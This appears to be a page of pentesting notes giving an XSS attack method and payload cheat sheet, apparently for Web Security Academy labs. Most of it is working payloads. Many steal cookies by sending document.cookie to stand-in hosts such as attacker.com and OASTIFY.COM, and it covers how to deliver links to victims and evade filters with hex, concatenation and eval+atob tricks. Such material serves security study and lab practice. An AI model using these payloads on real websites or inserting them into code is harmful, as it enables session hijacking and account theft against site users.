XSS

Reflected:

Identify user input fields:
- Find locations where the server reflects user input in the HTTP response. This could be search fields, form submissions, or URL query parameters.
Probe with XSS payloads:
- Inject simple XSS payloads like:
  - https://example.com/search?q=<script>alert(1)</script>
  - <img src="x" onerror="alert(1)">
- If the input is reflected unsanitized in the HTML response, the payload will be executed in the victim's browser.
Craft a targeted payload:
- Once you’ve verified reflection, modify the script to achieve something malicious, such as:
  - Stealing cookies with <script>document.location='https://attacker.com?cookie='+document.cookie</script>.
Deliver payload:
- Share the malicious link via email, chat, or any other method. When a victim clicks the link, the XSS payload is executed.

Stored:

dentify input fields that store data:
- Look for areas where user data is stored and reflected back later, such as comment sections, user profiles, or message boards.
Test with XSS payload:
- Submit an XSS payload like:
  - <script>alert('XSS')</script> in a comment or profile field.
- If the payload is stored and reflected unsanitized in the webpage, the script will execute when another user views it.
Create a malicious payload:
- Use JavaScript to steal session tokens, redirect users, or perform other harmful actions.
Wait for victim interaction:
- Once stored, any user who accesses the page will trigger the stored XSS attack.

Common attack vectors:

URL parameters (for reflected XSS).
Comment sections, user profile pages, or message boards (for stored XSS).

Payloads:

Basic payloads

<img src=1 onerror=alert(1)>

"><svg><animatetransform onbegin=alert(1)>

<>\'\"<script>{{7*7}}$(alert(1)}"-prompt(69)-"fuzzer

Testing allowed tags:

Intruder tag <§§> with
Copy tags to clipboards: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
Intruder <allowed-tag%20§§=1>
Copy event to clipboard: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

Custom tags allowed

Note: The custom tag with the ID x, which contains an onfocus event handler that triggers the document.location function. The HASH # character at the end of the URL focuses on this element as soon as the page is loaded, causing the payload to be called. Host the payload script on the exploit server in script tags, and send to victim.

<script>
location = 'https://TARGET.net/?search=<xss+id=x+onfocus=document.location='https://OASTIFY.COM/?c='+document.cookie tabindex=1>#x';
</script>

search=<xss+id=x+onfocus=alert(document.cookie) tabindex=1>#x';
search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';

//Encoded
<script>
location = 'https://TARGET.net/?search=%3Cxss+id%3Dx+onfocus%3Ddocument.location%3D%27https%3A%2F%2FOASTIFY.COM%2F%3Fc%3D%27%2Bdocument.cookie%20tabindex=1%3E#x';
</script>

SVG payload with animatetransform

<iframe src="https://TARGET.net/?search="><svg><animatetransform onbegin=document.location='https://OASTIFY.COM/?cookies='+document.cookie;>">
</iframe>

Protocol assing inside payload

<script>location.protocol='javascript';</script>#%0adocument.location='http://OASTIFY.COM/?p='+document.cookie//&context=html

Autorun with onfocus

<script>
location = 'https://TARGET.net/?search=<xss+id=x+onfocus=document.location='https://OASTIFY.COM/?c='+document.cookie tabindex=1>#x';
</script>

Onhashchange

<iframe src="https://TARGET.net/#" onload="document.location='http://OASTIFY.COM/?cookies='+document.cookie"></iframe>

Onresize

<iframe src="https://0ac2003803e52c8e80b3309c00fc00a0.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>

decoded
search="><body onresize=print()>" onload=this.style.width='100px'>

</script><script>document.location="https://OASTIFY.COM/?cookie="+document.cookie</script>

<script>
location = "https://TARGET.net/?search=</ScRiPt ><img src=a onerror=document.location="https://OASTIFY.COM/?biscuit="+document.cookie>"
</script>

Input value inside JS backticks

${alert(document.cookie)}

Escaping quote input

\';document.location=`https://OASTIFY.COM/?BackTicks=`+document.cookie;//

XSS WAF bypass

https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/

The web application has a filter that prevents using "document.cookie" string into any user input. In this case, JavaScript global variable could be used to bypass it. We have got many way to access the document.cookie from the window or self object. For example, something like window["document"]["cookie"] will not be blocked

window["document"]["cookie"]	
window["alert"](window["document"]["cookie"]);	= alert(document.cookie)
fetch(`https://OASTIFY.COM/?jsonc=` + window["document"]["cookie"])

The more complex techniques

//Concatenation
//alert(document.cookie);
self["ale"+"rt"](self["doc"+"ument"]["coo"+"kie"])


//Hex representation
//alert(document.cookie)
self["\x61\x6c\x65\x72\x74"](
    self["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]
        ["\x63\x6f\x6f\x6b\x69\x65"]
)


//eval + atob

self["eval"](
    self["atob"](
    "base64payload"
    )
)


//jQuery
self["$"]["globalEval"]("alert(1)");	
self["\x24"]
["\x67\x6c\x6f\x62\x61\x6c\x45\x76\x61\x6c"]
("\x61\x6c\x65\x72\x74\x28\x31\x29");


//Object.keys Iteration
Object.keys(self) -> //returns available objects with index no
Object.keys(self)[5] = alert
Object.keys(self)[5]("foo") = alert("foo")

PreviousPayloads NextInformation disclosure

Last updated 8 months ago